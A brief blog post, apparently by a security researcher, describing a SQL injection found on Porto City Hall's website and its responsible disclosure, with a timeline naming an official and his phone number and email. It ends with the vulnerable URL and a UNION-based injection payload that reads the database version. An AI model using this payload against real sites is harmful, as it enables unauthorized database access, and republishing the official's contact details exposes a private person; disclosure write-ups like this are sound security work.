Was very cool to find a SQL Injection on Porto's City Hall.

Easy to report and things worked well overall.

.

20/03/17 – Warning phone call to: 222097050, spoke with Mr. José Lobão

20/03/17 – Report done to joselobao@cm-porto.pt

21/04/17 – Thank you letter received.

.

Here a copy of the report I did: pdf report

.

SQLi in: http://www.cm-porto.pt/cultura/noticias?id=22827

.

Injection example:

http://www.cm-porto.pt/cultura/noticias?id=-1674 UNION ALL SELECT CONCAT(0x7171706271,IFNULL(CAST(version() AS CHAR),0x20),0x7176787071)-- ZKXp